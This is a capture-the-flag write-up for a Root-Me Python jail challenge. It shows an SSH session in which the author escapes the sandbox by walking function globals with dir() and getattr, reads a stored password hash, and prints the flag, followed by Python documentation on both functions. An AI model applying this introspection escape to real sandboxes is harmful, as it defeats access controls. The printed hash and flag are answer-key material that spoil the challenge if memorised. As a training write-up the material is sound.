LINK:https://www.root-me.org/en/Challenges/App-Script/Python-PyJail-2e
Reference:http://n3k0sec.top/2018/04/15/root-me-App-Script/
Solution:
[ BlackArch ~ ]# ssh -p 2222 app-script-ch9@challenge02.root-me.org
_ _ _ ___ ____
___| |__ __ _| | | ___ _ __ __ _ ___ / _ \___ \
/ __| '_ \ / _` | | |/ _ \ '_ \ / _` |/ _ \ | | |__) |
| (__| | | | (_| | | | __/ | | | (_| | __/ |_| / __/
\___|_| |_|\__,_|_|_|\___|_| |_|\__, |\___|\___/_____|
|___/ root-me.org
app-script-ch9@challenge02.root-me.org's password:
__ _ __
___ __ ____ / /__ _(_) / Welcome on PyJail2
/ _ \/ // / // / _ `/ / /
/ .__/\_, /\___/\_,_/_/_/ Use getout() function if you want to
/_/ /___/ escape from here and get the flag !
>>> print dir(getout)
['__call__', '__class__', '__closure__', '__code__', '__defaults__', '__delattr__', '__dict__', '__doc__', '__format__', '__get__', '__getattribute__', '__globals__', '__hash__', '__init__', '__module__', '__name__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'func_closure', 'func_code', 'func_defaults', 'func_dict', 'func_doc', 'func_globals', 'func_name']
>>> print getattr(getout,dir(getout)[-2])
{'execute': <function execute at 0xb7cb4f0c>, 'random': <built-in method random of Random object at 0x83dcec4>, '__builtins__': <module '__builtin__' (built-in)>, '__file__': '/challenge/app-script/ch9/ch9.py', 'cmd': <module 'cmd' from '/usr/lib/python2.7/cmd.pyc'>, '__package__': None, 'sys': <module 'sys' (built-in)>, 'passwd': 'cf95e28ee52545298411f5bee2ca8a54', 'intro': ' __ _ __\n ___ __ ____ / /__ _(_) /\tWelcome on PyJail2\n / _ \\/ // / // / _ `/ / / \n / .__/\\_, /\\___/\\_,_/_/_/ \tUse getout() function if you want to\n /_/ /___/ \tescape from here and get the flag !\n', 'Jail': <class __main__.Jail at 0xb7cadbcc>, '__name__': '__main__', 'os': <module 'os' from '/usr/lib/python2.7/os.pyc'>, '__doc__': None, 'md5': <built-in function openssl_md5>}
>>> print list(getattr(getout,dir(getout)[-2]))
['execute', 'random', '__builtins__', '__file__', 'cmd', '__package__', 'sys', 'passwd', 'intro', 'Jail', '__name__', 'os', '__doc__', 'md5']
>>> print list(getattr(getout,dir(getout)[-2]))[-7]
passwd
>>> print getout(getattr(getout,dir(getout)[-2])[list(getattr(getout,dir(getout)[-2]))[-7]])
Well done ! Here is your so desired flag :
ValidateMeDude!
Reference:https://docs.python.org/2/library/functions.html?highlight=dir#dir
https://docs.python.org/2/library/functions.html?highlight=getattr#getattr
-
getattr(object, name[, default]) -
Return the value of the named attribute of object. name must be a string. If the string is the name of one of the object’s attributes, the result is the value of that attribute. For example,
getattr(x, 'foobar')is equivalent tox.foobar. If the named attribute does not exist, default is returned if provided, otherwiseAttributeErroris raised.
-
dir([object]) -
Without arguments, return the list of names in the current local scope. With an argument, attempt to return a list of valid attributes for that object.
If the object has a method named
__dir__(), this method will be called and must return the list of attributes. This allows objects that implement a custom__getattr__()or__getattribute__()function to customize the waydir()reports their attributes.If the object does not provide
__dir__(), the function tries its best to gather information from the object’s__dict__attribute, if defined, and from its type object. The resulting list is not necessarily complete, and may be inaccurate when the object has a custom__getattr__().The default
dir()mechanism behaves differently with different types of objects, as it attempts to produce the most relevant, rather than complete, information:- If the object is a module object, the list contains the names of the module’s attributes.
- If the object is a type or class object, the list contains the names of its attributes, and recursively of the attributes of its bases.
- Otherwise, the list contains the object’s attributes’ names, the names of its class’s attributes, and recursively of the attributes of its class’s base classes.
The resulting list is sorted alphabetically. For example:
>>> import struct >>> dir() # show the names in the module namespace ['__builtins__', '__doc__', '__name__', 'struct'] >>> dir(struct) # show the names in the struct module ['Struct', '__builtins__', '__doc__', '__file__', '__name__', '__package__', '_clearcache', 'calcsize', 'error', 'pack', 'pack_into', 'unpack', 'unpack_from'] >>> class Shape(object): def __dir__(self): return ['area', 'perimeter', 'location'] >>> s = Shape() >>> dir(s) ['area', 'perimeter', 'location']